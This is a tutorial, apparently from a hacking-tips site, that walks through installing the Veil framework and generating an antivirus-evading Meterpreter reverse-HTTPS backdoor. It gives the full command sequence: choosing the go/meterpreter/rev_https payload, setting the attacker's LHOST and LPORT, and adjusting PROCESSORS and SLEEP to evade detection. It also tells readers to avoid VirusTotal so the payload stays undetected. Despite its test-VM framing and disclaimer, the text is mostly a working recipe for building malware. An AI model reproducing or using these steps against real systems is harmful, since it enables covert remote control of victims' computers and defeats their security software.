Backdoor Payload with Veil
Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
Download and install it from here.
Change Directory to the folder you would like to download and install the app in.
# cd /opt/
Use git clone <url of target>
/opt# git clone github.com/Veil-Framework/Veil/
Cd to the “config” folder
/opt# cd /Veil/config/
Run #./setup.sh --silent --force
#./setup.sh --silent --force
The installation will take up a few minutes.
This is what you will get when the installation is finished:
When you are ready, let’s run the app:
Cd to the Veil folder and run:
#./Veil.py
Run the update, just to be on the safe side, making sure that you get the latest db.
Type "list" and you will see the options of Veil:
Start with option 1 – Evasion.
Veil> use 1
Once you are in Veil/Evasion>
Type "list" again to see the entire payload you can use in Veil:
The payload is divided into three parts:
Payload program language
type of payload
payload method
For this test you will use the number 15) go/meterpreter/rev_https.py
In Veil commend type:
Veil/Evasion>:use 15
Start with setting the LHOST = your I.P. address (the Kali machine):
[go/meterpreter/rev_https>>]: set LHOST 10.0.2.4
The next stage is to set the port with set LPORT 8080 (or any port you like).
[go/meterpreter/rev_https>>]: set LPORT 8080
Type “options” to see all the options again and will see your configuration, the IP and port:
The option window will now show your data:
To bypass the antivirus on the target computer, you will tweak your payload a bit by changing the number of “processors” and the “sleep” time (in seconds):
[go/meterpreter/rev_https>>]: set PROCESSORS 1
[go/meterpreter/rev_https>>]: set SLEEP 6
To check again if all is set, type “options” and hit enter:
[go/meterpreter/rev_https>>]: options
Now, all that is left is to generate the backdoor and give it a name:
[go/meterpreter/rev_https>>]: generate
When the process is finished, you will see all the info of your built:
You can run the ”checkvt” commend to check your payload, but the best way to check it is to send it to your test machine (Your Windows 10 vm).
** Don’t check your payload with VirusTotal! It will register your payload and share it with all antiviruses and your payload will not work anymore **
To check if your new payload can go undetected with all or some antiviruses, go to https://nodistribute.com/ and upload it for a check.
If you see that it has been detected try to play with the options, time, and number of process, and so on.
In addition, do not forget to update the Veil every time.
Congratulations! You now have a new backdoor payload!
The next stage is to start Listening to the connection of your payload
All the guides, tips, and tricks on this web site are for education purpose only, the website owner is not accountable for any use of this information